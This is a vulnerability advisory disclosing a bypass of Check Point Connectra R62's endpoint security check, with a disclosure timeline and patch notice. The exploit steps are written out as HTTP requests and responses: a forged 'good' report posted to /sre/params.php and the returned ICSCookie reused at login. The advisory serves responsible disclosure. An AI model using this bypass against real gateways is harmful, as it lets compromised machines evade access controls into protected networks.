Check Point Connectra End Point security bypass
||Roni Bachar and Nir Goldshlager
|CVSS Base Score
See this note in TXT Version
Check Point Connectra is a complete Web Security Gateway that provides
SSL VPN access and comprehensive endpoint and integrated intrusion
Security in a single unified remote access solution. By combining both SSL
VPN connectivity and security in one solution, organizations can effectively
deploy SSL VPNs Safely and securely to a diverse set of remote users while
ensuring the confidentiality and integrity of information that is critical
to the success of any business.
For more Information please refer to:
One of the major things in Check Point Connectra is Comprehensive endpoint
Before a client connects to the internal network a test is being done on the
client to check if there is any security hazard on his computer. If a hazard
is detected the user is prompted with the hazard details and asked to run
the test again before getting the ability to login to the network.
A bypass to this test has been detected by Roni Bachar and Nir Goldshlager.
A user with a security hazard or a Trojan can bypass the end point security
tests and login to the network with a security hazard on his computer. The
bypass is being done by sending a "good" report to the /sre/params.php page
after sending the report a set cookie will be send from the server to the
client. This cookie can be used to bypass the endpoint security findings.
The bypass was detected on the latest version of checkpoint connectra R62.
The vulnerability can be exploited by doing the following stages:
Sending a post request as followed:
POST https://serverip/sre/params.php HTTP/1.1
After sending the request a Set-Cookie will be received from the Check Point
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 Sep
2016 17:16:19 GMT; path=/; secure
This ICSCookie is needed to be enteredd into the next request
GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727)
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d
Check point released a patch for this vulnerability.
V. DISCLOSURE TIMELINE
20.12.06 First Identification of the flaw
24.12.06 Reporting the flaw to checkpoint
27.12.06 Meeting checkpoint security stuff
22.01.07 Publishing the vulnerability.
22.01.07 Checkpoint Released a patch for the vulnerability
The vulnerability was discovered by Roni Bachar and Nir Goldshlager.